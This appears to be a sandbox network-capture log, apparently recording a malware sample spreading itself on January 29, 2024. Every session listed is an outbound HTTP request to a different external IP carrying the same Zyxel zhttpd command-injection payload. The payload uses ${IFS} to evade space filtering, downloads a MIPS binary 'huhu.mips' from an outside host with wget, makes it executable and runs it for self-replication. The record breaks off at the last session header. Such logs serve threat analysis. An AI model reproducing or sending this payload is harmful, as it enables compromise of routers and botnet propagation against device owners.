                                              Jan 29, 2024 07:03:42.863874912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2562192.168.2.143686086.154.251.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863945007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2563192.168.2.143991054.133.215.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.863975048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2564192.168.2.143384057.74.105.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864023924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2565192.168.2.1438546223.100.52.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864051104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2566192.168.2.1454168157.73.85.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864099026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2567192.168.2.14582201.160.192.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864139080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2568192.168.2.145381074.126.162.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864187956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2569192.168.2.1442082157.22.22.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864216089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2570192.168.2.1454968125.96.217.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864265919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2571192.168.2.1437124132.153.149.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864306927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2572192.168.2.1459082147.2.45.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864325047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2573192.168.2.145536261.81.33.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864382029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2574192.168.2.1433450205.155.194.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864403009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2575192.168.2.1450034191.73.140.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864432096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2576192.168.2.1433638221.201.122.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864470005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2577192.168.2.1447222158.53.158.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864511967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2578192.168.2.144459652.211.230.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864573956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2579192.168.2.143396438.169.31.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864589930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2580192.168.2.145875650.149.150.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864635944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2581192.168.2.1442678103.209.169.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864665031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2582192.168.2.1449242121.229.82.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864717007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2583192.168.2.144458645.58.217.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864768982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2584192.168.2.1456754209.24.179.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864801884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2585192.168.2.1442156141.37.121.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864847898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2586192.168.2.14393141.102.220.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864893913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2587192.168.2.1437312100.184.163.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864914894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2588192.168.2.143374868.217.49.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864949942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2589192.168.2.1439282153.31.6.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864969969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2590192.168.2.145956273.159.238.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.864996910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2591192.168.2.144441898.33.246.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865039110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2592192.168.2.1435028120.32.143.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865071058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2593192.168.2.143414696.117.181.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865104914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2594192.168.2.1437276185.126.120.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865158081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2595192.168.2.1433362218.34.230.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865189075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2596192.168.2.1457456110.164.57.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865221977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2597192.168.2.1446790198.102.217.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865259886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2598192.168.2.144934475.150.57.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865298986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2599192.168.2.145332865.9.229.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865355015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2600192.168.2.1451354202.131.30.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865375996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2601192.168.2.1451516153.222.113.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865406990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2602192.168.2.1448600189.180.199.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865447044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2603192.168.2.1456036205.236.227.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865489960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2604192.168.2.144764084.162.174.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865520000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2605192.168.2.1449642158.215.3.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865576982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2606192.168.2.145629695.254.209.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865614891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2607192.168.2.1460846158.13.7.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865634918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2608192.168.2.1455928126.35.255.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865667105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2609192.168.2.1459728212.122.254.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865704060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2610192.168.2.1437678153.233.1.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865751028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2611192.168.2.145272847.7.35.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865787983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2612192.168.2.1455448141.49.182.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865808010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2613192.168.2.1433302174.177.30.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865859985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2614192.168.2.145763654.13.158.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865910053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2615192.168.2.145077683.219.70.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865936995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2616192.168.2.1451848167.2.154.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.865967989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2617192.168.2.143360874.119.108.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866004944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2618192.168.2.1445958158.249.119.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866036892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2619192.168.2.145569282.57.181.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866085052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2620192.168.2.145523667.209.177.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866101027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2621192.168.2.1448056188.40.154.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866125107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2622192.168.2.1433098210.151.182.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866169930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2623192.168.2.1438266208.146.75.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866195917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2624192.168.2.14435322.82.241.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.866224051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2625192.168.2.143539081.253.56.50443
                                              TimestampBytes transferredDirectionData
